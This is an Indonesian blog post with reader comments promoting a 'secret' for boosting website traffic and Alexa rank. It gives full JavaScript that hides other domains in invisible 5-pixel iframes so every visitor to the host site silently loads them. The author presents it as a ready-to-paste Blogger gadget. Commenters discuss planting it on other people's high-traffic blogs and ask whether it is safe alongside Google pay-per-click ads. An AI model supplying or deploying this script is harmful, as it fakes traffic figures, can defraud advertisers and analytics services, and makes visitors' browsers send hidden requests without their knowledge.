Raseco.web.id Buka Rahasia Bagaimana Membagi Traffik Gratis

Raseco.web.id Buka Rahasia Bagaimana Membagi Traffik GratisRaseco.web.id Buka Rahasia Bagaimana Membagi Traffik Gratis - Setelah ane posting Raseco.web.id Bagi-bagi Traffic Gratis beberapa sobat menanyakan bagaimana cara membagi trafik (menambah trafik) di blog/website dan juga banyak sobat yang ingin traffiknya segera bertambah (imbas ke Alexa Rank). Rasanya berdosa kalau raseco hanya menyimpan rahasia bagi-bagi traffik ini untuk sendiri. Sebenernya banyak rekan kita yang menggunakan script berbagi traffik untuk mendapatkan uang, misalnya membayar sekian rupiah tiap bulan untuk mendapatkan traffik. Sebernarnya banyak cara dapat kita lakukan untuk menambah traffik, misalnya dengan mengikuti program auto surfing di internet, namun pernah ane mencoba menggunakan program autosurfing di internet malah membuat akun facebook ane kena blok, karena di blog ane pernah ane pasang badge facebook. Mungkin facebook mengira ini semacam flooding ke situsnya karena traffik datang begitu cepatnya paling hanya sekitar 5-10 detik (ane pakai autosurfpro.com, tapi sekarang nggak lagi)
Nah ini mungkin cara paling aman untuk menambah traffik, kali ini menggunakan script javasript.
Sebenernya cara kerja script ini cukup simple, yaitu meload website tertentu (secara hidden tentunya) ketika kita membuka website yang telah kita pasang script ini. Jadi hal yang paling utama adalah sobat harus sudah memiliki website/blog yang sudah memiliki traffik tinggi. So, langsung saja ini dia scriptnya cekidot:


<script type="text/javascript">
var Lokasi = document.referrer.toLocaleLowerCase();
//Alamat yang akan ditambahi traffik disini 

var Domainku = ["http://www.domainanda.com","http://www.domainandalagi.com"];
var aDomains = [""];
var mantap = 0;


//Valid referrer
for (i=0;i<aDomains.length;i++) {
//Cek referrer
if (Lokasi.indexOf(aDomains[i], 0) > -1)
{
mantap = 1;
break;
}
}


//Valid referrer
if (mantap == 1)
{
//Loop
for (i=0;i<Domainku.length;i++) {
invisibleWindow("mydiv" + i,Domainku[i]);
}
}


function invisibleWindow(iframeID, url) {
divel = document.createElement("div");
divel.id = "div" + iframeID;
divel.style.width = "5px";
divel.style.height = "5px";
divel.style.visibility = "hidden";


//Add div
document.body.appendChild(divel);


domiframe = document.createElement("iframe");
domiframe.id = iframeID;
domiframe.src = url;
domiframe.style.width = "5px";
domiframe.style.height = "5px";
domiframe.style.visibility = "hidden";


var divid = document.getElementById("div" + iframeID);
divid.appendChild(domiframe);
}

</script>

Ket: silahkan sobat ganti script yang berwarna merah dan biru sampai berapapun web yang akan di tambah traffiknya. Namun dengan semakin bertambahnya website yang dimasukkan ke dalam Domainku = ["websitesobat"] maka semakin berat pula beban website yang sobat pasangi script ini.

Untuk memasang script ini, jika sobat menggunakan blogger, langsung saja tambahkan gadget HTML/Javascript di design page elements sobat.
Silahkan sobat gunakan sebaik-baiknya script diatas, siapa tahu sobat dapat menghasilkan rupiah dengan menjual traffik :D

Berlangganan update artikel terbaru via email:

24 Responses to "Raseco.web.id Buka Rahasia Bagaimana Membagi Traffik Gratis"

  1. Oalah, terbukti nih sob ? boleh nih dicoba rahasianya :D

    BalasHapus
  2. nice post gan . ane agak setuju dengan yang ini

    BalasHapus
  3. bener2 ajib sob....langsung di coba...

    thank ya dah share

    BalasHapus
  4. cara kerjanya gini sob:
    misalkan sobat punya blog/situs anggaplah webA, webB, webC.
    Nah di webA kita sudah punya banyak pengunjung, dari webA ini kita mau berbagi trafik ke webB dan webC, jadi kita masukkan script ini ke webA dengan mengganti kode:
    var Domainku = ["http://www.domainanda.com","http://www.domainandalagi.com"];
    menjadi
    var Domainku = ["http://webB","http://webC"];

    nah dengan begitu traffik di webA akan dishare ke webB dan webC, namun usahakan jangan terjadi tumpang tindih misal kita sudah pasang di webA:
    var Domainku = ["http://webB","http://webC"];

    nah di webB usahakan jangan memasang
    var Domainku = ["http://webA","http://webC"];

    karena kita sudah load webB di webA, nanti bisa2 bingung tuh website :) (hanya logika ane saja sih sob, ane juga belum coba)

    semoga membantu, kalau masih belum jelas silahkan kontak disini kembali. Thanks

    BalasHapus
  5. Silahkan di letakkan di sidebar kanan/kiri/bawah sob

    BalasHapus
  6. semua perlu di coba, dan lihat trafficnya cuma apakah bisa di gabung dengan web site orang lain, hehehe yang trafficnya bagus hehehehe

    BalasHapus
  7. wah perlu dicoba nih, siap mencoba :)

    BalasHapus
  8. Wah ternyata rahasianya disini pantes saja traffik waktu bagi bagi traffik sampe tiga hari rata rata 200 up perhari ..thank share gan

    BalasHapus
  9. Cara ini aman buat PPC google ngga bos??...

    BalasHapus
  10. @nurman nah itu sob masalahnya harus punya web/blog yang punya trafik tinggi hehe, kali aja google mau tuh dipasangi scripnya wkakakakk..
    @X-NET monggo sob
    @Media update sami2 sob..
    @Komik selama ini ane baik2 saja sob dengan om google (GA)...

    BalasHapus
  11. saya juga menemukan script semacam ini di posting blog lain. cuma waktu saya coba gak bekerja tuh. saya pake wordpress. minta pencerahannya gan.

    BalasHapus
  12. Cara kerja script tersebut sebenarnya hanya "sebagai hantu" atau tidak secara langsung pengunjung mampir di blog sobat. Jadi script tersebut harus dipasang di blog lain, jadi sobat pasang scriptnya bukan di blog sobat, namun di blog lain lalu ubah var Domainku = ["http://biologimediacentre.com/"];

    BalasHapus
  13. mas berarti domain yang di pasang script trafficnya tipuan alaias nebeng di domain yang traffic tinggi

    BalasHapus
  14. mantab mas, nice info.

    tertarik tukeran link nggak mas?
    link mas sudah aku pasang diblogku www.holidaymamboo.com
    ditunggu link backnya mas. makasih

    BalasHapus
  15. wah asik nieh,tapi kok kaya sistem boster yach.

    BalasHapus
  16. @tv streaming indonesia betul sob, memang "nebeng" di website lain..
    @angga's siap sob, link sobat sudah dipasang
    @sprei anak hehehe...lumayan sob buat singsetin trafik alexa :)

    BalasHapus
  17. Mantap sob tutorialnya,,, boleh dicoba ne..

    oha yah tukeran link yuk sob,,


    link sobat sudah terpasang ni blog ane, silahkan ceck yah sob di sidebar blog ane atas nama "raseco.web.id", atau mau ganti ancoe text silahkan hubungi ane kembali.

    lINK KODE BLOG ANE ADA DI Link Exchange

    Makasih sebelumnya gan...

    BalasHapus
  18. silahkan dicoba sob..
    terimakasih sudah mampir disini, and thanks sudah pasang link ane..demikian juga link sobat sudah mejeng di blog ane

    BalasHapus
  19. Terima ksih gan ane coba dulu ya...

    BalasHapus
  20. gan aman ga buat website bisniss,anee takut ditendang,,,ooom google?

    BalasHapus

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel